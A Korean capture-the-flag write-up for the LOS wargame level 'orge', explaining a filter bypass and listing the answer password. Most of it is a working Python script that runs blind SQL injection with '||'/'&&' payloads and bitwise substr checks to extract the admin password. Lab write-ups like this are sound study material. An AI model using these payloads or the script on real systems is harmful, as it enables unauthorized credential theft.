LOS - orge / level 7

문제

풀이 과정

if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe"); 

 

pw의 값에 or / and를 필터링 하는 것을 볼 수 있다

 

또한 admin의 진짜 pw값을 넣으면 문제가 풀린다

 

이를 통해 blind sql injection을 수행한다

정답

?pw=7b751aec

활용 코드

python requests를 이용하여 코드를 작성하여 문제를 해결하였다

 

import requests

url = "input your url"	#
cookie = {input your cookie}	#
user = 'input find user' # 

def change_bit(array):
    two_bit_array = []
    for i in range(len(array)):
        two_bit_array.append(int(array[i],2))
    return two_bit_array



def change_str(array):
    str_array = []
    result_str = ""
    for i in range(len(array)):
        str_array.append(chr(array[i]))
        result_str = result_str + str_array[i]
    return result_str



def find_length(url,user,cookie):
    i = 1
    while True:
        params = f"?pw=%27%20||%20id=%27{user}%27%20%26%26%20length(pw) > {i}%23"
        send_url = url + params

        print(f"Params = {params}")
        
        res = requests.get(send_url, cookies=cookie)
        # print(res.text)
        if "Hello admin" not in res.text:
            break
        i += 1
    print(f"{user} Length = {i}")

    return i

def blind(url, user, cookie,length):
    results = []
    for i in range(1, length+1):
        k = 2
        result = ""
        for count in range(8):
            go = k ** count
            params = f"?pw=%27%20||%20id=%27{user}%27%20%26%26%20ascii(substr(pw,{i},1)) %26 {go}%23"

            send_url = url + params
            res = requests.get(send_url,cookies=cookie)

            if "Hello admin" in res.text:
                result = "1" + result
            else:
                result = "0" + result
        print(f"{i} : {result}")
        results.append(result)

        two_bit_array = change_bit(results)
        result_str = change_str(two_bit_array)
    return result_str



print("Find User Length")
length = find_length(url,user, cookie)

array = blind(url,user, cookie, length)

print(array)